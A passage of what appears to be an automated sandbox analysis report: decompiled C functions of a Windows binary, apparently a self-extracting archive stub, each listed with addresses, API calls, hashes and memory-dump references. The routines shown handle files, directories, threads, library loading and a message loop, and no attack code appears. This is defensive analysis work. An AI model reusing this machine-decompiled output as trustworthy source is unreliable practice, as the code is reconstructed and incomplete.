						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














          0x001f9768
          0x001f976d
          0x001f9773
          0x001f977c
          0x001f977e
          0x001f9789
          0x001f9794
          0x001f9790
          0x001f9790
          0x001f9790
          0x001f979a
          0x001f97a2
          0x001f97aa
          0x001f97b3
          0x001f97b5
          0x001f97b5
          0x001f97c0
          0x001f97c5
          0x001f97c7
          0x001f97c7
          0x001f97dc
          0x001f97e0
          0x001f97e9
          0x001f97eb
          0x001f97eb
          0x001f9804
          0x001f980a
          0x001f980f
          0x001f9873
          0x001f9878
          0x001f987f
          0x001f9888
          0x001f9893
          0x001f9893
          0x001f989e
          0x001f98a1
          0x001f98a4
          0x001f98a7
          0x001f98ad
          0x001f98be
          0x001f98c2
          0x001f98c2
          0x001f98d2
          0x001f9811
          0x001f9817
          0x001f9833
          0x001f9862
          0x001f9867
          0x001f9869
          0x001f9869
          0x00000000
          0x001f9867
          0x001f984c
          0x001f984e
          0x001f9857
          0x001f9859
          0x001f9859
          0x001f9860
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x001f9860

          APIs
          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,001F76F2,?,00000005,?,00000011), ref: 001F9804
          • GetLastError.KERNEL32(?,?,001F76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F9811
          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,001F76F2,?,00000005,?), ref: 001F9846
          • GetLastError.KERNEL32(?,?,001F76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F984E
          • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,001F76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F9893
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File$CreateErrorLast$Time
          • String ID:
          • API String ID: 1999340476-0
          • Opcode ID: 04a51c6c6f38f0a5f374fd22cfa980b5a6b306db1489b47a4306ff6cc5f1c961
          • Instruction ID: ccc82682a8d6f8bedb614e8cf68af7cf94061bcf2ab86ea625c32504cb32969b
          • Opcode Fuzzy Hash: 04a51c6c6f38f0a5f374fd22cfa980b5a6b306db1489b47a4306ff6cc5f1c961
          • Instruction Fuzzy Hash: 6841287144474E7BE320AF60DC05BFABBD4FB01364F100719FAA1961D1D3B59999CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020A388, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020A388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0x2375c8; // 0xf004a
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







          0x0020a399
          0x0020a3a1
          0x0020a3aa
          0x0020a3b0
          0x0020a3b7
          0x0020a3c8
          0x0020a3cc
          0x0020a3d6
          0x00000000
          0x0020a3d6
          0x0020a3be
          0x0020a3c6
          0x00000000
          0x00000000
          0x0020a3c6
          0x0020a3e0

          APIs
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0020A399
          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020A3AA
          • IsDialogMessageW.USER32(000F004A,?), ref: 0020A3BE
          • TranslateMessage.USER32(?), ref: 0020A3CC
          • DispatchMessageW.USER32(?), ref: 0020A3D6
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Message$DialogDispatchPeekTranslate
          • String ID:
          • API String ID: 1266772231-0
          • Opcode ID: 5593db87d7a29e8b8cdab5eb9396440d99e0e2baab3042123e80d22981055759
          • Instruction ID: c7f7e4daba8ac21ea8d8a565e55ed4e4bd6f4daf8669084cbfc82fcea392a332
          • Opcode Fuzzy Hash: 5593db87d7a29e8b8cdab5eb9396440d99e0e2baab3042123e80d22981055759
          • Instruction Fuzzy Hash: FBF0177191132ABBCB30AFE2BD4CEEB7F6CEE052617405055F80AD2440E768D506CBE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
          Download Yara Rule
          C-Code - Quality: 25%
          			E00209AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E001FFCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0x22dffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0x22deb4( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L0020D820(); // executed
				 *0x22df08(0x2375c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











          0x00209aaf
          0x00209ab6
          0x00209ab9
          0x00209ac2
          0x00209aca
          0x00209ad1
          0x00209adb
          0x00209ae6
          0x00209aea
          0x00209aed
          0x00209af0
          0x00209afa
          0x00209b07

          APIs
            • Part of subcall function 001FFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
            • Part of subcall function 001FFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          • OleInitialize.OLE32(00000000), ref: 00209AB9
          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00209AF0
          • SHGetMalloc.SHELL32(002375C0), ref: 00209AFA
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
          • String ID: riched20.dll
          • API String ID: 3498096277-3360196438
          • Opcode ID: 5ed3afc77131757db3068607f590e1fe6ea3b0f80d37fe2de511142c5f47a7ed
          • Instruction ID: 0b473b9f5e6d29171ed4c0b5c92c3593aa707ab1c85909edfd4159e671ee7c8c
          • Opcode Fuzzy Hash: 5ed3afc77131757db3068607f590e1fe6ea3b0f80d37fe2de511142c5f47a7ed
          • Instruction Fuzzy Hash: 5DF04FB1D0021DABCB20EFD9D849AEEFBFCEF54311F00405AE814A2240DBB416068BA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
          Download Yara Rule
          C-Code - Quality: 66%
          			E0020C891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E0020D940();
				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
				_t7 = E001FF835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E001FF94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}







          0x0020c891
          0x0020c899
          0x0020c8a7
          0x0020c8bc
          0x0020c8c1
          0x0020c8c5
          0x0020c8ca
          0x0020c8d4
          0x0020c8cd
          0x0020c8cd
          0x0020c8d3
          0x0020c8d3
          0x0020c8e3
          0x0020c8e3
          0x0020c8ed

          APIs
          • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0020C8A7
          • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0020C8E3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: EnvironmentVariable
          • String ID: sfxcmd$sfxpar
          • API String ID: 1431749950-3493335439
          • Opcode ID: 40e33890648085558634af0171295c6b44ccee0c7b53f2d56b304dc8c9f746f6
          • Instruction ID: c1eaa217a3079e0e46c637a2c0b801a37bc35712f0be372c523830daf6edb303
          • Opcode Fuzzy Hash: 40e33890648085558634af0171295c6b44ccee0c7b53f2d56b304dc8c9f746f6
          • Instruction Fuzzy Hash: FEF0E2B2821229B6C7216FC0AC09EBA776C9F15B51B004166FE4896183DAA19862C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F964A, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
          Download Yara Rule
          C-Code - Quality: 59%
          			E001F964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E001F9745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E001F964A(_t25);
						}
					}
				}
				return _t15;
			}







          0x001f964d
          0x001f9650
          0x001f9656
          0x001f9660
          0x001f9660
          0x001f9672
          0x001f967a
          0x001f96d6
          0x001f967c
          0x001f967e
          0x001f9685
          0x001f969e
          0x001f96a2
          0x001f96b3
          0x001f96b7
          0x001f96d1
          0x001f96d1
          0x001f96c3
          0x001f96c3
          0x001f96cc
          0x00000000
          0x001f96ce
          0x001f96ce
          0x00000000
          0x001f96ce
          0x001f96cc
          0x001f96a4
          0x001f96a4
          0x001f96ad
          0x00000000
          0x001f96af
          0x001f96af
          0x001f96af
          0x001f96ad
          0x001f9687
          0x001f9687
          0x001f968f
          0x00000000
          0x001f9691
          0x001f9691
          0x001f9692
          0x001f9692
          0x001f9697
          0x001f9697
          0x001f968f
          0x001f9685
          0x001f96de

          APIs
          • GetStdHandle.KERNEL32(000000F6), ref: 001F965A
          • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 001F9672
          • GetLastError.KERNEL32 ref: 001F96A4
          • GetLastError.KERNEL32 ref: 001F96C3
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLast$FileHandleRead
          • String ID:
          • API String ID: 2244327787-0
          • Opcode ID: b83a1bcd553f39204dc4bbbd6a864757b0656a5a7cf9fbf767fab7b40696e3d9
          • Instruction ID: b3f6e00d026e82c038405253df767263fab5db9c756b75b25da86e692da8da65
          • Opcode Fuzzy Hash: b83a1bcd553f39204dc4bbbd6a864757b0656a5a7cf9fbf767fab7b40696e3d9
          • Instruction Fuzzy Hash: 29115A3090020CFFDB346AA49954BB977A9AB14331F10852AFA2AC5190DB758E84DF51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00219A2C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
          Download Yara Rule
          C-Code - Quality: 95%
          			E00219A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x250768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x225ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x4319796b
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











          0x00219a31
          0x00219a35
          0x00219a3c
          0x00219a40
          0x00219a4e
          0x00219a5e
          0x00219a64
          0x00219a68
          0x00219a91
          0x00219a93
          0x00219a97
          0x00219a9a
          0x00219a9a
          0x00219aa0
          0x00219aa2
          0x00000000
          0x00219aa3
          0x00219a6a
          0x00219a73
          0x00219a82
          0x00219a75
          0x00219a78
          0x00219a7e
          0x00219a7e
          0x00219a86
          0x00000000
          0x00219a88
          0x00219a8b
          0x00219a8d
          0x00000000
          0x00219a8d
          0x00219a86
          0x00219a42
          0x00219a47
          0x00000000

          APIs
          • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00212E0F,00000000,00000000,?,002199D3,00212E0F,00000000,00000000,00000000,?,00219BD0,00000006,FlsSetValue), ref: 00219A5E
          • GetLastError.KERNEL32(?,002199D3,00212E0F,00000000,00000000,00000000,?,00219BD0,00000006,FlsSetValue,00226058,00226060,00000000,00000364,?,002185E8), ref: 00219A6A
          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002199D3,00212E0F,00000000,00000000,00000000,?,00219BD0,00000006,FlsSetValue,00226058,00226060,00000000), ref: 00219A78
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: LibraryLoad$ErrorLast
          • String ID:
          • API String ID: 3177248105-0
          • Opcode ID: d2f31dd2ca30ae0bca1a0acf133039838955e40ac51fb6fa2225a818d3a94649
          • Instruction ID: 3402d1b6f78bcd826db8ec48f2987a76a9eb6989470e0a4264b17c15cc64c27e
          • Opcode Fuzzy Hash: d2f31dd2ca30ae0bca1a0acf133039838955e40ac51fb6fa2225a818d3a94649
          • Instruction Fuzzy Hash: B601F732261233BBC7318FA8AC58E9677D8BF65BA17500224FD0AD3140D731E9A9C6E0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002004F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
          Download Yara Rule
          C-Code - Quality: 71%
          			E002004F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				void* _t7;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x2300e0 > 0) {
					_t18 = 0x2300e4;
					do {
						_t7 = CreateThread(0, 0x10000, E0020062F, 0x2300e0, 0,  &_v4); // executed
						_t22 = _t7;
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x2300e0);
							E001F6CC9(E0020E214(E001F6CCE(0x2300e0)), 0x2300e0, 0x2300e0, 2);
						}
						 *_t18 = _t22;
						 *0x002301E4 =  *((intOrPtr*)(0x2301e4)) + 1;
						_t8 =  *0x237368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x2300e0);
					return _t8;
				}
				return _t5;
			}













          0x002004fa
          0x002004fe
          0x00200502
          0x00200505
          0x00200519
          0x0020051f
          0x00200523
          0x00200525
          0x0020052a
          0x00200547
          0x00200547
          0x0020054c
          0x0020054e
          0x00200554
          0x0020055b
          0x00200560
          0x00200560
          0x00200566
          0x00200567
          0x0020056a
          0x00000000
          0x0020056f
          0x00200573

          APIs
          • CreateThread.KERNELBASE ref: 00200519
          • SetThreadPriority.KERNEL32(?,00000000), ref: 00200560
            • Part of subcall function 001F6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F6CEC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Thread$CreatePriority__vswprintf_c_l
          • String ID: CreateThread failed
          • API String ID: 2655393344-3849766595
          • Opcode ID: 423b0e0f20c1aad4fcb0bcc5ac2d3ea7b5365aa3a1cda00d7f159b427653349e
          • Instruction ID: d751e97509c0580334a39b1de523d095e42b0e797d3bad8d87d3ab2ca6bbfdcd
          • Opcode Fuzzy Hash: 423b0e0f20c1aad4fcb0bcc5ac2d3ea7b5365aa3a1cda00d7f159b427653349e
          • Instruction Fuzzy Hash: 2501F9B1364706BFE7346F90ACC5F6677ACFB55751F10002DF6C5621C2CAA169A9CA30
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9C34, Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
          Download Yara Rule
          C-Code - Quality: 92%
          			E001F9C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
								L21:
								 *((char*)(_t53 + 8)) = 1;
								return _t42;
							} else {
								_t56 = _t53 + 0x1e;
								if(E001F6C55(0x2300e0, _t53 + 0x1e, 0) == 0) {
									E001F6E9B(0x2300e0, _t59, 0, _t56);
									goto L21;
								}
								if(_a8 < _t59 && _a8 > 0) {
									_t58 =  *_t53;
									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
									asm("sbb edx, 0x0");
									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
								}
								continue;
							}
						} else {
							goto L7;
						}
						while(1) {
							L7:
							_t32 = _t59 - _t57;
							if(_t32 >= 0x4000) {
								_t32 = 0x4000;
							}
							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
							asm("sbb bl, bl");
							_t42 =  ~_t10 + 1;
							if(_t42 == 0) {
								goto L14;
							}
							_t57 = _t57 + 0x4000;
							if(_t57 < _t59) {
								continue;
							}
							L13:
							if(_t42 != 0) {
								goto L21;
							}
							goto L14;
						}
						goto L14;
						L12:
						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
						asm("sbb al, al");
						_t42 =  ~(_t24 - 1) + 1;
						goto L13;
					}
				}
				return 1;
			}













          0x001f9c34
          0x001f9c35
          0x001f9c3a
          0x001f9c3e
          0x001f9c4b
          0x001f9c55
          0x001f9c55
          0x001f9c5a
          0x001f9c5a
          0x001f9c5f
          0x001f9c65
          0x00000000
          0x00000000
          0x001f9c67
          0x001f9c6b
          0x001f9ccf
          0x001f9cd3
          0x001f9d2d
          0x001f9d30
          0x00000000
          0x001f9cdb
          0x001f9cdd
          0x001f9ced
          0x001f9d28
          0x00000000
          0x001f9d28
          0x001f9cf3
          0x001f9d04
          0x001f9d0a
          0x001f9d13
          0x001f9d18
          0x001f9d18
          0x00000000
          0x001f9cf3
          0x00000000
          0x00000000
          0x00000000
          0x001f9c6d
          0x001f9c6d
          0x001f9c6f
          0x001f9c76
          0x001f9c78
          0x001f9c78
          0x001f9c95
          0x001f9c9a
          0x001f9c9c
          0x001f9c9f
          0x00000000
          0x00000000
          0x001f9ca1
          0x001f9ca9
          0x00000000
          0x00000000
          0x001f9ccb
          0x001f9ccd
          0x00000000
          0x00000000
          0x00000000
          0x001f9ccd
          0x00000000
          0x001f9cad
          0x001f9cbc
          0x001f9cc5
          0x001f9cc9
          0x00000000
          0x001f9cc9
          0x001f9c5a
          0x00000000

          APIs
          • GetStdHandle.KERNEL32(000000F5,?,?,001FC90A,00000001,?,?,?,00000000,00204AF4,?,?,?,?,?,00204599), ref: 001F9C4F
          • WriteFile.KERNEL32(?,00000000,?,002047A1,00000000,?,?,00000000,00204AF4,?,?,?,?,?,00204599,?), ref: 001F9C8F
          • WriteFile.KERNELBASE(?,00000000,?,002047A1,00000000,?,00000001,?,?,001FC90A,00000001,?,?,?,00000000,00204AF4), ref: 001F9CBC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileWrite$Handle
          • String ID:
          • API String ID: 4209713984-0
          • Opcode ID: 73e8d065e2a6455cd78ce971fd690040e933e2631cf7de00aa1ec11f90f7ca6e
          • Instruction ID: bb70aed6f89f478eafb49332a6a4df35dcc3b3bd9fdfac598bd3a0c722c5a687
          • Opcode Fuzzy Hash: 73e8d065e2a6455cd78ce971fd690040e933e2631cf7de00aa1ec11f90f7ca6e
          • Instruction Fuzzy Hash: 223156B120420DAFDB24AF64C808BBAB7E8FFA1710F108119F39593190C735A84DCBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9EF2, Relevance: 4.6, APIs: 3, Instructions: 56COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001F9EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t8;
				long _t10;
				void* _t11;
				int _t18;
				WCHAR* _t21;

				E0020D940();
				_t21 = _a4;
				_t8 =  *(E001FB927(__eflags, _t21)) & 0x0000ffff;
				if(_t8 == 0x2e || _t8 == 0x20) {
					L3:
					if(E001F9E6B(_t21) != 0 || E001FB32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
						_t10 = GetLastError();
						__eflags = _t10 - 2;
						if(_t10 == 2) {
							L12:
							_t11 = 2;
						} else {
							__eflags = _t10 - 3;
							if(_t10 == 3) {
								goto L12;
							} else {
								_t11 = 1;
							}
						}
					} else {
						goto L6;
					}
				} else {
					_t18 = CreateDirectoryW(_t21, 0); // executed
					if(_t18 != 0) {
						L6:
						if(_a8 != 0) {
							E001FA12F(_t21, _a12); // executed
						}
						_t11 = 0;
					} else {
						goto L3;
					}
				}
				return _t11;
			}









          0x001f9efa
          0x001f9f00
          0x001f9f09
          0x001f9f0f
          0x001f9f23
          0x001f9f2b
          0x001f9f69
          0x001f9f6f
          0x001f9f72
          0x001f9f7e
          0x001f9f80
          0x001f9f74
          0x001f9f74
          0x001f9f77
          0x00000000
          0x001f9f79
          0x001f9f7b
          0x001f9f7b
          0x001f9f77
          0x00000000
          0x00000000
          0x00000000
          0x001f9f16
          0x001f9f19
          0x001f9f21
          0x001f9f56
          0x001f9f5a
          0x001f9f60
          0x001f9f60
          0x001f9f65
          0x00000000
          0x00000000
          0x00000000
          0x001f9f21
          0x001f9f85

          APIs
          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001F9F19
          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001F9F4C
          • GetLastError.KERNEL32(?,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001F9F69
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateDirectory$ErrorLast
          • String ID:
          • API String ID: 2485089472-0
          • Opcode ID: 0e4be975c0d674492b3b316d097bcde41e68db89f8cb32faea4293ddbdcb62ba
          • Instruction ID: 2a9c562f0956539b274e3ddf1bc91a20031a704a9e2c6e4af26fcda801493179
          • Opcode Fuzzy Hash: 0e4be975c0d674492b3b316d097bcde41e68db89f8cb32faea4293ddbdcb62ba
          • Instruction Fuzzy Hash: F401D4B151822CB6DB31BBB49C49BFE3B4CAF16740F040441FB05E60A1D7A4CA82C6E6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F1973, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 285COMMON
          Download Yara Rule
          C-Code - Quality: 95%
          			E001F1973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
